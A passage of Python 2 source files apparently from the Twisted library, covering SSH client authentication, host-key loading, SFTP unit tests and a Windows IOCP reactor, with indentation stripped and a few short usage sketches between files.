retVal = 0
if not options['known-hosts'] and not os.path.exists(os.path.expanduser('~/.ssh/')):
print 'Creating ~/.ssh directory...'
os.mkdir(os.path.expanduser('~/.ssh'))
kh_file = options['known-hosts'] or '~/.ssh/known_hosts'
try:
known_hosts = open(os.path.expanduser(kh_file))
except IOError:
return 0
for line in known_hosts.xreadlines():
split = line.split()
if len(split) < 3:
continue
hosts, hostKeyType, encodedKey = split[:3]
if host not in hosts.split(','): # incorrect host
continue
if hostKeyType != keyType: # incorrect type of key
continue
try:
decodedKey = base64.decodestring(encodedKey)
except:
continue
if decodedKey == pubKey:
return 1
else:
retVal = 2
return retVal
class SSHUserAuthClient(userauth.SSHUserAuthClient):
def __init__(self, user, options, *args):
userauth.SSHUserAuthClient.__init__(self, user, *args)
self.keyAgent = None
self.options = options
self.usedFiles = []
if not options.identitys:
options.identitys = ['~/.ssh/id_rsa', '~/.ssh/id_dsa']
def serviceStarted(self):
if 'SSH_AUTH_SOCK' in os.environ and not self.options['noagent']:
log.msg('using agent')
cc = protocol.ClientCreator(reactor, agent.SSHAgentClient)
d = cc.connectUNIX(os.environ['SSH_AUTH_SOCK'])
d.addCallback(self._setAgent)
d.addErrback(self._ebSetAgent)
else:
userauth.SSHUserAuthClient.serviceStarted(self)
def serviceStopped(self):
if self.keyAgent:
self.keyAgent.transport.loseConnection()
self.keyAgent = None
def _setAgent(self, a):
self.keyAgent = a
d = self.keyAgent.getPublicKeys()
d.addBoth(self._ebSetAgent)
return d
def _ebSetAgent(self, f):
userauth.SSHUserAuthClient.serviceStarted(self)
def _getPassword(self, prompt):
try:
oldout, oldin = sys.stdout, sys.stdin
sys.stdin = sys.stdout = open('/dev/tty','r+')
p=getpass.getpass(prompt)
sys.stdout,sys.stdin=oldout,oldin
return p
except (KeyboardInterrupt, IOError):
print
raise ConchError('PEBKAC')
def getPassword(self, prompt = None):
if not prompt:
prompt = "%s@%s's password: " % (self.user, self.transport.transport.getPeer().host)
try:
p = self._getPassword(prompt)
return defer.succeed(p)
except ConchError:
return defer.fail()
def getPublicKey(self):
if self.keyAgent:
blob = self.keyAgent.getPublicKey()
if blob:
return blob
files = [x for x in self.options.identitys if x not in self.usedFiles]
log.msg(str(self.options.identitys))
log.msg(str(files))
if not files:
return None
file = files[0]
log.msg(file)
self.usedFiles.append(file)
file = os.path.expanduser(file)
file += '.pub'
if not os.path.exists(file):
return self.getPublicKey() # try again
try:
return keys.getPublicKeyString(file)
except:
return self.getPublicKey() # try again
def signData(self, publicKey, signData):
if not self.usedFiles: # agent key
return self.keyAgent.signData(publicKey, signData)
else:
return userauth.SSHUserAuthClient.signData(self, publicKey, signData)
def getPrivateKey(self):
file = os.path.expanduser(self.usedFiles[-1])
if not os.path.exists(file):
return None
try:
return defer.succeed(keys.getPrivateKeyObject(file))
except keys.BadKeyError, e:
if e.args[0] == 'encrypted key with no passphrase':
for i in range(3):
prompt = "Enter passphrase for key '%s': " % \
self.usedFiles[-1]
try:
p = self._getPassword(prompt)
return defer.succeed(keys.getPrivateKeyObject(file, passphrase = p))
except (keys.BadKeyError, ConchError):
pass
return defer.fail(ConchError('bad password'))
raise
except KeyboardInterrupt:
print
reactor.stop()
def getGenericAnswers(self, name, instruction, prompts):
responses = []
try:
oldout, oldin = sys.stdout, sys.stdin
sys.stdin = sys.stdout = open('/dev/tty','r+')
if name:
print name
if instruction:
print instruction
for prompt, echo in prompts:
if echo:
responses.append(raw_input(prompt))
else:
responses.append(getpass.getpass(prompt))
finally:
sys.stdout,sys.stdin=oldout,oldin
return defer.succeed(responses)
```
#### File: conch/openssh_compat/factory.py
```python
from twisted.conch.ssh import keys, factory, common
from twisted.python import log
import primes
import os
class OpenSSHFactory(factory.SSHFactory):
dataRoot = '/usr/local/etc'
moduliRoot = '/usr/local/etc' # for openbsd which puts moduli in a different
# directory from keys
def getPublicKeys(self):
ks = {}
for file in os.listdir(self.dataRoot):
if file[:9] == 'ssh_host_' and file[-8:]=='_key.pub':
try:
k = keys.getPublicKeyString(self.dataRoot+'/'+file)
t = common.getNS(k)[0]
ks[t] = k
except Exception, e:
log.msg('bad public key file %s: %s' % (file,e))
return ks
def getPrivateKeys(self):
ks = {}
euid,egid = os.geteuid(), os.getegid()
os.setegid(0) # gain privileges
os.seteuid(0)
for file in os.listdir(self.dataRoot):
if file[:9] == 'ssh_host_' and file[-4:]=='_key':
try:
k = keys.getPrivateKeyObject(self.dataRoot+'/'+file)
t = keys.objectType(k)
ks[t] = k
except Exception, e:
log.msg('bad private key file %s: %s' % (file, e))
os.setegid(egid) # drop them just as quickly
os.seteuid(euid)
return ks
def getPrimes(self):
try:
return primes.parseModuliFile(self.moduliRoot+'/moduli')
except IOError:
return None
```
#### File: conch/ssh/factory.py
```python
import md5
try:
import resource
except ImportError:
resource = None
from twisted.internet import protocol
from twisted.python import log
from twisted.conch import error
import transport, userauth, connection
import random
class SSHFactory(protocol.Factory):
services = {
'ssh-userauth':userauth.SSHUserAuthServer,
'ssh-connection':connection.SSHConnection
}
def startFactory(self):
# disable coredumps
if resource:
resource.setrlimit(resource.RLIMIT_CORE, (0,0))
else:
log.msg('INSECURE: unable to disable core dumps.')
if not hasattr(self,'publicKeys'):
self.publicKeys = self.getPublicKeys()
if not hasattr(self,'privateKeys'):
self.privateKeys = self.getPrivateKeys()
if not self.publicKeys or not self.privateKeys:
raise error.ConchError('no host keys, failing')
if not hasattr(self,'primes'):
self.primes = self.getPrimes()
#if not self.primes:
# log.msg('disabling diffie-hellman-group-exchange because we cannot find moduli file')
# transport.SSHServerTransport.supportedKeyExchanges.remove('diffie-hellman-group-exchange-sha1')
if self.primes:
self.primesKeys = self.primes.keys()
def buildProtocol(self, addr):
t = transport.SSHServerTransport()
t.supportedPublicKeys = self.privateKeys.keys()
if not self.primes:
ske = t.supportedKeyExchanges[:]
ske.remove('diffie-hellman-group-exchange-sha1')
t.supportedKeyExchanges = ske
t.factory = self
return t
def getPublicKeys(self):
"""
Called when the factory is started to get the public portions of the
server's host keys. Returns a dictionary mapping SSH key types to
public key strings.
@rtype: C{dict}
"""
raise NotImplementedError
def getPrivateKeys(self):
"""
Called when the factory is started to get the private portions of the
server's host keys. Returns a dictionary mapping SSH key types to
C{Crypto.PublicKey.pubkey.pubkey} objects.
@rtype: C{dict}
"""
raise NotImplementedError
def getPrimes(self):
"""
Called when the factory is started to get Diffie-Hellman generators and
primes to use. Returns a dictionary mapping number of bits to lists
of tuples of (generator, prime).
@rtype: C{dict}
"""
def getDHPrime(self, bits):
"""
Return a tuple of (g, p) for a Diffie-Hellman process, with p being as
close to bits bits as possible.
@type bits: C{int}
@rtype: C{tuple}
"""
self.primesKeys.sort(lambda x,y,b=bits:cmp(abs(x-b), abs(y-b))) # sort prime sizes by distance from the requested bit count
realBits = self.primesKeys[0]
return random.choice(self.primes[realBits])
def getService(self, transport, service):
"""
Return a class to use as a service for the given transport.
@type transport: L{transport.SSHServerTransport}
@type service: C{str}
@rtype: subclass of L{service.SSHService}
"""
if transport.isAuthorized or service == 'ssh-userauth':
return self.services[service]
```
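A minimal sketch of a concrete subclass, showing only the key-loading hooks documented above; the host key file names are assumptions, and the helpers used are the same `keys` functions seen in `openssh_compat/factory.py` earlier.
```python
# Hedged sketch: implementing the abstract key hooks of SSHFactory.
# The key file paths below are assumptions for illustration.
from twisted.conch.ssh import keys, factory

class ExampleSSHFactory(factory.SSHFactory):
    def getPublicKeys(self):
        # map SSH key type (e.g. 'ssh-rsa') to public key blobs
        return {'ssh-rsa': keys.getPublicKeyString('ssh_host_rsa_key.pub')}

    def getPrivateKeys(self):
        # map SSH key type to private key objects
        return {'ssh-rsa': keys.getPrivateKeyObject('ssh_host_rsa_key')}

    def getPrimes(self):
        # returning None makes buildProtocol() drop
        # diffie-hellman-group-exchange-sha1 from the key exchange list
        return None
```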
#### File: conch/ssh/service.py
```python
from twisted.python import log
class SSHService(log.Logger):
name = None # this is the ssh name for the service
protocolMessages = {} # these map #'s -> protocol names
transport = None # gets set later
def serviceStarted(self):
"""
called when the service is active on the transport.
"""
def serviceStopped(self):
"""
called when the service is stopped, either by the connection ending
or by another service being started
"""
def logPrefix(self):
return "SSHService %s on %s" % (self.name, self.transport.transport.logPrefix())
def packetReceived(self, messageType, packet):
"""
called when we receive a packet on the transport
"""
#print self.protocolMessages
f = getattr(self,'ssh_%s' % self.protocolMessages[messageType][4:], None)
if f:
f(packet)
else:
log.msg("couldn't handle", messageType)
log.msg(repr(packet[1:]))
self.transport.sendUnimplemented()
```
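The `packetReceived` dispatch above strips the leading `MSG_` from the name registered in `protocolMessages` and looks for a matching `ssh_*` method. A hedged sketch of that convention, with a made-up message number and name:
```python
# Illustration only: message number 100 and its name are invented here.
from twisted.conch.ssh import service

class ExampleService(service.SSHService):
    name = 'example'
    protocolMessages = {100: 'MSG_EXAMPLE_PING'}

    def ssh_EXAMPLE_PING(self, packet):
        # 'MSG_EXAMPLE_PING'[4:] == 'EXAMPLE_PING', so this method is called
        self.transport.sendPacket(100, packet)
```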
#### File: conch/test/test_filetransfer.py
```python
import os
import sys
from twisted.trial import unittest
try:
from twisted.conch import unix
except ImportError:
unix = None
try:
del sys.modules['twisted.conch.unix'] # remove the bad import
except KeyError:
# In Python 2.4, the bad import has already been cleaned up for us.
# Hooray.
pass
from twisted.conch import avatar
from twisted.conch.ssh import filetransfer, session
from twisted.internet import defer, reactor
from twisted.protocols import loopback
from twisted.python import components, log
class FileTransferTestAvatar(avatar.ConchUser):
def __init__(self, homeDir):
avatar.ConchUser.__init__(self)
self.channelLookup['session'] = session.SSHSession
self.subsystemLookup['sftp'] = filetransfer.FileTransferServer
self.homeDir = homeDir
def _runAsUser(self, f, *args, **kw):
try:
f = iter(f)
except TypeError:
f = [(f, args, kw)]
for i in f:
func = i[0]
args = len(i)>1 and i[1] or ()
kw = len(i)>2 and i[2] or {}
r = func(*args, **kw)
return r
def getHomeDir(self):
return os.path.join(os.getcwd(), self.homeDir)
class ConchSessionForTestAvatar:
def __init__(self, avatar):
self.avatar = avatar
if unix:
if not hasattr(unix, 'SFTPServerForUnixConchUser'):
# unix should either be a fully working module, or None. I'm not sure
# how this happens, but on win32 it does. Try to cope. --spiv.
import warnings
warnings.warn(("twisted.conch.unix imported %r, "
"but doesn't define SFTPServerForUnixConchUser'")
% (unix,))
unix = None
else:
class FileTransferForTestAvatar(unix.SFTPServerForUnixConchUser):
def gotVersion(self, version, otherExt):
return {'conchTest' : 'ext data'}
def extendedRequest(self, extName, extData):
if extName == 'testExtendedRequest':
return 'bar'
raise NotImplementedError
components.registerAdapter(FileTransferForTestAvatar,
FileTransferTestAvatar,
filetransfer.ISFTPServer)
class SFTPTestBase(unittest.TestCase):
def setUp(self):
self.testDir = self.mktemp()
# Give the testDir another level so we can safely "cd .." from it in
# tests.
self.testDir = os.path.join(self.testDir, 'extra')
os.makedirs(os.path.join(self.testDir, 'testDirectory'))
f = file(os.path.join(self.testDir, 'testfile1'),'w')
f.write('a'*10+'b'*10)
f.write(file('/dev/urandom').read(1024*64)) # random data
os.chmod(os.path.join(self.testDir, 'testfile1'), 0644)
file(os.path.join(self.testDir, 'testRemoveFile'), 'w').write('a')
file(os.path.join(self.testDir, 'testRenameFile'), 'w').write('a')
file(os.path.join(self.testDir, '.testHiddenFile'), 'w').write('a')
class TestOurServerOurClient(SFTPTestBase):
if not unix:
skip = "can't run on non-posix computers"
def setUp(self):
SFTPTestBase.setUp(self)
self.avatar = FileTransferTestAvatar(self.testDir)
self.server = filetransfer.FileTransferServer(avatar=self.avatar)
clientTransport = loopback.LoopbackRelay(self.server)
self.client = filetransfer.FileTransferClient()
self._serverVersion = None
self._extData = None
def _(serverVersion, extData):
self._serverVersion = serverVersion
self._extData = extData
self.client.gotServerVersion = _
serverTransport = loopback.LoopbackRelay(self.client)
self.client.makeConnection(clientTransport)
self.server.makeConnection(serverTransport)
self.clientTransport = clientTransport
self.serverTransport = serverTransport
self._emptyBuffers()
def _emptyBuffers(self):
while self.serverTransport.buffer or self.clientTransport.buffer:
self.serverTransport.clearBuffer()
self.clientTransport.clearBuffer()
def _delayedEmptyBuffers(self):
reactor.callLater(0.1, self._emptyBuffers)
def testServerVersion(self):
self.failUnlessEqual(self._serverVersion, 3)
self.failUnlessEqual(self._extData, {'conchTest' : 'ext data'})
def testOpenFileIO(self):
d = self.client.openFile("testfile1", filetransfer.FXF_READ |
filetransfer.FXF_WRITE, {})
self._emptyBuffers()
def _fileOpened(openFile):
self.failUnlessEqual(openFile, filetransfer.ISFTPFile(openFile))
d = _readChunk(openFile)
d.addCallback(_writeChunk, openFile)
return d
def _readChunk(openFile):
d = openFile.readChunk(0, 20)
self._emptyBuffers()
d.addCallback(self.failUnlessEqual, 'a'*10 + 'b'*10)
return d
def _writeChunk(_, openFile):
d = openFile.writeChunk(20, 'c'*10)
self._emptyBuffers()
d.addCallback(_readChunk2, openFile)
return d
def _readChunk2(_, openFile):
d = openFile.readChunk(0, 30)
self._emptyBuffers()
d.addCallback(self.failUnlessEqual, 'a'*10 + 'b'*10 + 'c'*10)
return d
d.addCallback(_fileOpened)
return d
def testClosedFileGetAttrs(self):
d = self.client.openFile("testfile1", filetransfer.FXF_READ |
filetransfer.FXF_WRITE, {})
self._emptyBuffers()
def _getAttrs(_, openFile):
d = openFile.getAttrs()
self._emptyBuffers()
return d
def _err(f):
log.flushErrors()
return f
def _close(openFile):
d = openFile.close()
self._emptyBuffers()
d.addCallback(_getAttrs, openFile)
d.addErrback(_err)
return self.assertFailure(d, filetransfer.SFTPError)
d.addCallback(_close)
return d
def testOpenFileAttributes(self):
d = self.client.openFile("testfile1", filetransfer.FXF_READ |
filetransfer.FXF_WRITE, {})
self._emptyBuffers()
def _getAttrs(openFile):
d = openFile.getAttrs()
self._emptyBuffers()
d.addCallback(_getAttrs2)
return d
def _getAttrs2(attrs1):
d = self.client.getAttrs('testfile1')
self._emptyBuffers()
d.addCallback(self.failUnlessEqual, attrs1)
return d
return d.addCallback(_getAttrs)
def testOpenFileSetAttrs(self):
# XXX test setAttrs
# Ok, how about this for a start? It caught a bug :) -- spiv.
d = self.client.openFile("testfile1", filetransfer.FXF_READ |
filetransfer.FXF_WRITE, {})
self._emptyBuffers()
def _getAttrs(openFile):
d = openFile.getAttrs()
self._emptyBuffers()
d.addCallback(_setAttrs)
return d
def _setAttrs(attrs):
attrs['atime'] = 0
d = self.client.setAttrs('testfile1', attrs)
self._emptyBuffers()
d.addCallback(_getAttrs2)
d.addCallback(self.failUnlessEqual, attrs)
return d
def _getAttrs2(_):
d = self.client.getAttrs('testfile1')
self._emptyBuffers()
return d
d.addCallback(_getAttrs)
return d
def testRemoveFile(self):
d = self.client.getAttrs("testRemoveFile")
self._emptyBuffers()
def _removeFile(ignored):
d = self.client.removeFile("testRemoveFile")
self._emptyBuffers()
return d
d.addCallback(_removeFile)
d.addCallback(_removeFile)
return self.assertFailure(d, filetransfer.SFTPError)
def testRenameFile(self):
d = self.client.getAttrs("testRenameFile")
self._emptyBuffers()
def _rename(attrs):
d = self.client.renameFile("testRenameFile", "testRenamedFile")
self._emptyBuffers()
d.addCallback(_testRenamed, attrs)
return d
def _testRenamed(_, attrs):
d = self.client.getAttrs("testRenamedFile")
self._emptyBuffers()
d.addCallback(self.failUnlessEqual, attrs)
return d.addCallback(_rename)
def testDirectoryBad(self):
d = self.client.getAttrs("testMakeDirectory")
self._emptyBuffers()
return self.assertFailure(d, filetransfer.SFTPError)
def testDirectoryCreation(self):
d = self.client.makeDirectory("testMakeDirectory", {})
self._emptyBuffers()
def _getAttrs(_):
d = self.client.getAttrs("testMakeDirectory")
self._emptyBuffers()
return d
# XXX not until version 4/5
# self.failUnlessEqual(filetransfer.FILEXFER_TYPE_DIRECTORY&attrs['type'],
# filetransfer.FILEXFER_TYPE_DIRECTORY)
def _removeDirectory(_):
d = self.client.removeDirectory("testMakeDirectory")
self._emptyBuffers()
return d
d.addCallback(_getAttrs)
d.addCallback(_removeDirectory)
d.addCallback(_getAttrs)
return self.assertFailure(d, filetransfer.SFTPError)
def testOpenDirectory(self):
d = self.client.openDirectory('')
self._emptyBuffers()
files = []
def _getFiles(openDir):
def append(f):
files.append(f)
return openDir
d = defer.maybeDeferred(openDir.next)
self._emptyBuffers()
d.addCallback(append)
d.addCallback(_getFiles)
d.addErrback(_close, openDir)
return d
def _checkFiles(ignored):
fs = list(zip(*files)[0])
fs.sort()
self.failUnlessEqual(fs,
['.testHiddenFile', 'testDirectory',
'testRemoveFile', 'testRenameFile',
'testfile1'])
def _close(_, openDir):
d = openDir.close()
self._emptyBuffers()
return d
d.addCallback(_getFiles)
d.addCallback(_checkFiles)
return d
def testLinkDoesntExist(self):
d = self.client.getAttrs('testLink')
self._emptyBuffers()
return self.assertFailure(d, filetransfer.SFTPError)
def testLinkSharesAttrs(self):
d = self.client.makeLink('testLink', 'testfile1')
self._emptyBuffers()
def _getFirstAttrs(_):
d = self.client.getAttrs('testLink', 1)
self._emptyBuffers()
return d
def _getSecondAttrs(firstAttrs):
d = self.client.getAttrs('testfile1')
self._emptyBuffers()
d.addCallback(self.assertEqual, firstAttrs)
return d
d.addCallback(_getFirstAttrs)
return d.addCallback(_getSecondAttrs)
def testLinkPath(self):
d = self.client.makeLink('testLink', 'testfile1')
self._emptyBuffers()
def _readLink(_):
d = self.client.readLink('testLink')
self._emptyBuffers()
d.addCallback(self.failUnlessEqual,
os.path.join(os.getcwd(), self.testDir, 'testfile1'))
return d
def _realPath(_):
d = self.client.realPath('testLink')
self._emptyBuffers()
d.addCallback(self.failUnlessEqual,
os.path.join(os.getcwd(), self.testDir, 'testfile1'))
return d
d.addCallback(_readLink)
d.addCallback(_realPath)
return d
def testExtendedRequest(self):
d = self.client.extendedRequest('testExtendedRequest', 'foo')
self._emptyBuffers()
d.addCallback(self.failUnlessEqual, 'bar')
d.addCallback(self._cbTestExtendedRequest)
return d
def _cbTestExtendedRequest(self, ignored):
d = self.client.extendedRequest('testBadRequest', '')
self._emptyBuffers()
return self.assertFailure(d, NotImplementedError)
```
#### File: internet/iocpreactor/client.py
```python
import socket
from twisted.persisted import styles
from twisted.internet.base import BaseConnector
from twisted.internet import defer, interfaces, error
from twisted.python import failure
from abstract import ConnectedSocket
from ops import ConnectExOp
from util import StateEventMachineType
from zope.interface import implements
class ClientSocket(ConnectedSocket):
def __init__(self, sock, protocol, sf):
ConnectedSocket.__init__(self, sock, protocol, sf)
self.repstr = '<%s to %s at %x>' % (self.__class__, self.sf.addr, id(self))
self.logstr = protocol.__class__.__name__+",client"
self.startReading()
class _SubConnector:
state = "connecting"
socket = None
def __init__(self, sf):
self.sf = sf
def startConnecting(self):
d = defer.maybeDeferred(self.sf.resolveAddress)
d.addCallback(self._cbResolveDone)
d.addErrback(self._ebResolveErr)
def _cbResolveDone(self, addr):
if self.state == "dead":
return
try:
skt = socket.socket(*self.sf.sockinfo)
except socket.error, se:
raise error.ConnectBindError(se[0], se[1])
try:
if self.sf.bindAddress is None:
self.sf.bindAddress = ("", 0) # necessary for ConnectEx
skt.bind(self.sf.bindAddress)
except socket.error, se:
raise error.ConnectBindError(se[0], se[1])
self.socket = skt
op = ConnectExOp(self)
op.initiateOp(self.socket, addr)
def _ebResolveErr(self, fail):
if self.state == "dead":
return
self.sf.connectionFailed(fail)
def connectDone(self):
if self.state == "dead":
return
self.sf.connectionSuccess()
def connectErr(self, err):
if self.state == "dead":
return
self.sf.connectionFailed(err)
class SocketConnector(styles.Ephemeral, object):
__metaclass__ = StateEventMachineType
implements(interfaces.IConnector)
transport_class = ClientSocket
events = ["stopConnecting", "disconnect", "connect"]
sockinfo = None
factoryStarted = False
timeoutID = None
def __init__(self, addr, factory, timeout, bindAddress):
from twisted.internet import reactor
self.state = "disconnected"
self.addr = addr
self.factory = factory
self.timeout = timeout
self.bindAddress = bindAddress
self.reactor = reactor
self.prepareAddress()
def handle_connecting_stopConnecting(self):
self.connectionFailed(failure.Failure(error.UserError()))
def handle_disconnected_stopConnecting(self):
raise error.NotConnectingError
handle_connected_stopConnecting = handle_disconnected_stopConnecting
handle_connecting_disconnect = handle_connecting_stopConnecting
def handle_connected_disconnect(self):
self.transport.loseConnection()
def handle_disconnected_disconnect(self):
pass
def handle_connecting_connect(self):
raise RuntimeError, "can't connect in this state"
handle_connected_connect = handle_connecting_connect
def handle_disconnected_connect(self):
self.state = "connecting"
if not self.factoryStarted:
self.factory.doStart()
self.factoryStarted = True
if self.timeout is not None:
self.timeoutID = self.reactor.callLater(self.timeout, self.connectionFailed, failure.Failure(error.TimeoutError()))
self.sub = _SubConnector(self)
self.sub.startConnecting()
self.factory.startedConnecting(self)
def prepareAddress(self):
raise NotImplementedError
def resolveAddress(self):
raise NotImplementedError
def connectionLost(self, reason):
self.state = "disconnected"
self.factory.clientConnectionLost(self, reason)
if self.state == "disconnected":
# factory hasn't called our connect() method
self.factory.doStop()
self.factoryStarted = 0
def connectionFailed(self, reason):
if self.sub.socket:
self.sub.socket.close()
self.sub.state = "dead"
del self.sub
self.state = "disconnected"
self.cancelTimeout()
self.factory.clientConnectionFailed(self, reason)
if self.state == "disconnected":
# factory hasn't called our connect() method
self.factory.doStop()
self.factoryStarted = 0
def cancelTimeout(self):
if self.timeoutID:
try:
self.timeoutID.cancel()
except ValueError:
pass
del self.timeoutID
def connectionSuccess(self):
socket = self.sub.socket
self.sub.state = "dead"
del self.sub
self.state = "connected"
self.cancelTimeout()
p = self.factory.buildProtocol(self.buildAddress(socket.getpeername()))
self.transport = self.transport_class(socket, p, self)
p.makeConnection(self.transport)
```
#### File: internet/iocpreactor/proactor.py
```python
from twisted.internet import defer, base, main
from twisted.internet.interfaces import IReactorTCP, IReactorUDP, IReactorMulticast, IReactorArbitrary, IReactorProcess
from twisted.python import threadable, log, reflect
from zope.interface import implements, implementsOnly
import tcp, udp, process, process_waiter
from _iocp import iocpcore
class Proactor(iocpcore, base.ReactorBase, log.Logger):
# IReactorSSL (or leave it until exarkun finishes TLS)
# IReactorCore (cleanup)
implementsOnly(IReactorTCP, IReactorUDP, IReactorMulticast, IReactorArbitrary, IReactorProcess)
handles = None
iocp = None
def __init__(self):
iocpcore.__init__(self)
base.ReactorBase.__init__(self)
self.logstr = reflect.qual(self.__class__)
self.processWaiter = process_waiter.ProcessWaiter(self)
# self.completables = {}
def startRunning(self):
threadable.registerAsIOThread()
self.fireSystemEvent('startup')
self.running = 1
def run(self):
self.startRunning()
self.mainLoop()
def mainLoop(self):
while self.running:
try:
while self.running:
# Advance simulation time in delayed event
# processors.
self.runUntilCurrent()
t2 = self.timeout()
t = self.running and t2
self.doIteration(t)
except KeyboardInterrupt:
self.stop()
except:
log.msg("Unexpected error in main loop.")
log.deferr()
else:
log.msg('Main loop terminated.')
def removeAll(self):
return []
def installWaker(self):
pass
def wakeUp(self):
def ignore(ret, bytes, arg):
pass
if not threadable.isInIOThread():
self.issuePostQueuedCompletionStatus(ignore, None)
def listenTCP(self, port, factory, backlog=50, interface=''):
p = tcp.Port((interface, port), factory, backlog)
p.startListening()
return p
def connectTCP(self, host, port, factory, timeout=30, bindAddress=None):
c = tcp.Connector((host, port), factory, timeout, bindAddress)
c.connect()
return c
def listenUDP(self, port, protocol, interface='', maxPacketSize=8192):
p = udp.Port((interface, port), protocol, maxPacketSize)
p.startListening()
return p
def listenMulticast(self, port, protocol, interface='', maxPacketSize=8192, listenMultiple=False):
p = udp.MulticastPort((interface, port), protocol, maxPacketSize)
p.startListening()
return p
def connectUDPblah(self, remotehost, remoteport, protocol, localport=0,
interface='', maxPacketSize=8192):
p = udp.ConnectedPort((remotehost, remoteport), (interface, localport), protocol, maxPacketSize)
p.startListening()
return p
def listenWith(self, portType, *args, **kw):
p = portType(*args, **kw)
p.startListening()
return p
def connectWith(self, connectorType, *args, **kw):
c = connectorType(*args, **kw)
c.connect()
return c
def spawnProcess(self, processProtocol, executable, args=(), env={}, path=None, uid=None, gid=None, usePTY=0, childFDs=None):
"""Spawn a process."""
if uid is not None:
raise ValueError("Setting UID is unsupported on this platform.")
if gid is not None:
raise ValueError("Setting GID is unsupported on this platform.")
if usePTY:
raise ValueError("PTYs are unsupported on this platform.")
if childFDs is not None:
raise ValueError(
"Custom child file descriptor mappings are unsupported on "
"this platform.")
return process.Process(self, processProtocol, executable, args, env, path)
def logPrefix(self):
return self.logstr
def install():
from twisted.python import threadable
p = Proactor()
threadable.init()
main.installReactor(p)
```
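If this reactor were to be used, the usual pattern (a sketch; the module path is assumed from the file layout above) is to call `install()` before anything imports `twisted.internet.reactor`:
```python
# Sketch: install the IOCP proactor before the default reactor is imported.
from twisted.internet.iocpreactor import proactor
proactor.install()

from twisted.internet import reactor  # now refers to the Proactor instance
```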
#### File: internet/iocpreactor/server.py
```python
from sets import Set
import socket
from twisted.internet import interfaces, address, error
from twisted.persisted import styles
from twisted.python import log, reflect
from ops import AcceptExOp
from abstract import ConnectedSocket
from util import StateEventMachineType
from zope.interface import implements
class ServerSocket(ConnectedSocket):
def __init__(self, sock, protocol, sf, sessionno):
ConnectedSocket.__init__(self, sock, protocol, sf)
self.logstr = "%s,%s,%s" % (self.protocol.__class__.__name__, sessionno, self.getPeerHost())
self.repstr = "<%s #%s on %s>" % (self.protocol.__class__.__name__, sessionno, self.getPeerPort())
self.startReading()
class ListeningPort(log.Logger, styles.Ephemeral, object):
__metaclass__ = StateEventMachineType
implements(interfaces.IListeningPort)
events = ["startListening", "stopListening", "loseConnection", "acceptDone", "acceptErr"]
sockinfo = None
transport_class = ServerSocket
sessionno = 0
# Actual port number being listened on, only set to a non-None
# value when we are actually listening.
_realPortNumber = None
def __init__(self, addr, factory, backlog):
self.state = "disconnected"
self.addr = addr
self.factory = factory
self.backlog = backlog
self.accept_op = AcceptExOp(self)
def __repr__(self):
if self._realPortNumber is not None:
return "<%s of %s on %s>" % (self.__class__, self.factory.__class__,
self._realPortNumber)
else:
return "<%s of %s (not listening)>" % (self.__class__, self.factory.__class__)
def handle_disconnected_startListening(self):
log.msg("%s starting on %s" % (self.factory.__class__, self.getOwnPort()))
try:
skt = socket.socket(*self.sockinfo)
skt.bind(self.addr)
except socket.error, le:
raise error.CannotListenError, (None, None, le)
# Make sure that if we listened on port 0, we update that to
# reflect what the OS actually assigned us.
self._realPortNumber = skt.getsockname()[1]
log.msg("%s starting on %s" % (self.factory.__class__, self._realPortNumber))
self.factory.doStart()
skt.listen(self.backlog)
self.socket = skt
self.state = "listening"
self.startAccepting()
def startAccepting(self):
self.accept_op.initiateOp(self.socket.fileno())
def handle_listening_acceptDone(self, sock, addr):
protocol = self.factory.buildProtocol(self.buildAddress(addr))
if protocol is None:
sock.close()
else:
s = self.sessionno
self.sessionno = s+1
transport = self.transport_class(sock, protocol, self, s)
protocol.makeConnection(transport)
if self.state == "listening":
self.startAccepting()
def handle_disconnected_acceptDone(self, sock, addr):
sock.close()
def handle_listening_acceptErr(self, ret, bytes):
# print "ono acceptErr", ret, bytes
self.stopListening()
def handle_disconnected_acceptErr(self, ret, bytes):
# print "ono acceptErr", ret, bytes
pass
def handle_listening_stopListening(self):
self.state = "disconnected"
self.socket.close()
log.msg('(Port %s Closed)' % self._realPortNumber)
self._realPortNumber = None
self.factory.doStop()
handle_listening_loseConnection = handle_listening_stopListening
def handle_disconnected_stopListening(self):
raise error.NotListeningError
def logPrefix(self):
"""Returns the name of my class, to prefix log entries with.
"""
return reflect.qual(self.factory.__class__)
def connectionLost(self, reason):
pass
# stupid workaround for test_tcp.LoopbackTestCase.testClosePortInProtocolFactory
disconnected = property(lambda self: self.state == "disconnected")
connected = property(lambda self: self.state == "listening")
```
#### File: internet/iocpreactor/tcp.py
```python
import types, socket, operator
from twisted.internet.abstract import isIPAddress # would rather not import "abstract"
from twisted.internet import defer, interfaces, address, error
from twisted.python import log
import server, client
import iocpdebug
from zope.interface import implements
class TcpMixin:
def getTcpNoDelay(self):
return operator.truth(self.socket.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY))
def setTcpNoDelay(self, enabled):
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, enabled)
def getTcpKeepAlive(self):
return operator.truth(self.socket.getsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE))
def setTcpKeepAlive(self, enabled):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, enabled)
def getHost(self):
return address.IPv4Address('TCP', *(self.socket.getsockname() + ('INET',)))
def getPeer(self):
return address.IPv4Address('TCP', *(self.socket.getpeername() + ('INET',)))
def getPeerHost(self):
return self.socket.getpeername()[0]
def getPeerPort(self):
return self.socket.getpeername()[1]
class ServerSocket(server.ListeningPort.transport_class, TcpMixin):
implements(interfaces.ITCPTransport)
class Port(server.ListeningPort):
sockinfo = (socket.AF_INET, socket.SOCK_STREAM, 0)
transport_class = ServerSocket
def __init__(self, (host, port), factory, backlog):
if iocpdebug.debug:
print "listening on (%s, %s)" % (host, port)
if isinstance(port, types.StringTypes):
try:
port = socket.getservbyname(port, 'tcp')
except socket.error, e:
raise error.ServiceNameUnknownError(string=str(e))
server.ListeningPort.__init__(self, (host, port), factory, backlog)
def getOwnPort(self):
return self.addr[1]
def getHost(self):
return address.IPv4Address('TCP', *(self.socket.getsockname() + ('INET',)))
def buildAddress(self, addr):
return address._ServerFactoryIPv4Address('TCP', addr[0], addr[1], 'INET')
class ClientSocket(client.SocketConnector.transport_class, TcpMixin):
implements(interfaces.ITCPTransport)
class Connector(client.SocketConnector):
sockinfo = (socket.AF_INET, socket.SOCK_STREAM, 0)
transport_class = ClientSocket
def _filterRealAddress(self, host):
return (host, self.addr[1])
def prepareAddress(self):
host, port = self.addr
if iocpdebug.debug:
